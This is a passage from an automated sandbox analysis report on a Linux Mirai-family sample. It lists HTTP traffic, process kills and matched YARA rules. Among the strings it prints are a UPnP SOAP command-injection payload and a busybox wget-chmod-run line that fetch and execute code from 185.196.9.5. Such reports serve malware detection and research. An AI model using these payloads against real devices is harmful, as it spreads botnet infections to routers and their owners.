HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 25 Feb 2024 18:05:26 GMTServer: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-PatchVary: Accept-EncodingContent-Encoding: gzipContent-Length: 268Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 50 cb 6a c3 30 10 bc fb 2b b6 b9 b4 a5 58 eb b8 0f 1a 10 86 36 76 48 20 69 05 75 0f 39 ca 96 40 a2 8e 24 24 25 6d fe be b2 43 a1 97 85 99 9d 9d 61 96 5e d5 ef cb 76 cf 1a 58 b7 bb 2d b0 cf d7 ed 66 09 b3 1c 71 d3 b4 2b c4 ba ad 2f 9b 92 14 88 cd db ac ca a8 8a 87 a1 a2 4a 72 91 40 d4 71 90 d5 43 71 0f 2b eb 3b 2d 84 34 14 2f 64 46 71 12 d1 ce 8a f3 78 37 af fe 69 12 ca a8 ab f6 f6 08 c2 9a eb 08 8a 9f 24 38 e9 0f 3a 04 6d 0d 44 0b bc ef 65 08 80 da 08 f9 43 9c 72 d9 c8 2b 1d 20 48 7f 92 9e 50 74 a3 b1 4f 83 0b e1 93 b8 7a 71 bc 57 12 4b 52 92 05 dc d4 b2 d3 dc dc 02 5b 33 7c 4c d4 53 3e bf 1b a4 31 e7 05 7c eb a8 e0 e3 a8 6c d0 26 67 3c f6 09 4d ae c0 23 b8 a0 3d 0f a4 b3 51 7f 11 7f 04 66 7d 84 e7 82 e2 5f 4c 2a 37 d5 4a 45 c6 77 64 bf 7b 2c 18 40 49 01 00 00 Data Ascii: MPj0+X6vH iu9@$$%mCa^vX-fq+/Jr@qCq+;-4/dFqx7i$8:mDeCr+ HPtOzqWKR[3\|LS>1\|l&g<M#=Qf}_L*7JEwd{,@I
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 18:05:27 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; SameSite=Lax; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: WebServerDate: Wed, 05 Jan 2000 00:03:24 GMTContent-Type: text/htmlContent-Length: 110Connection: closeData Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 20:05:33 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 18:05:40 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 25 Feb 2024 18:05:46 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 42Content-Type: application/jsonX-Content-Security-Policy:Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:05:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: qynd1m1ejo.elf	String found in binary or memory: http://185.196.9.5/8UsA.sh;
Source: qynd1m1ejo.elf	String found in binary or memory: http://185.196.9.5/bins/x86
Source: qynd1m1ejo.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: qynd1m1ejo.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Malicious sample detected (through community Yara rule)

Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3273, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3275, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3278, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3368, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3394, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3456, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3461, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3465, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3469, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3475, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 3044, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.196.9.5 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.shMV

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3273, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3275, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3278, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3368, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3394, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3456, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3461, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3465, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3469, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5881)	SIGKILL sent: pid: 3475, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 723, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 764, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 804, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 850, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 888, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 933, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 1431, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 1432, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 3044, result: successful	Jump to behavior
Source: /tmp/qynd1m1ejo.elf (PID: 5888)	SIGKILL sent: pid: 3047, result: successful	Jump to behavior

Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: qynd1m1ejo.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5880.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5889.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5882.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
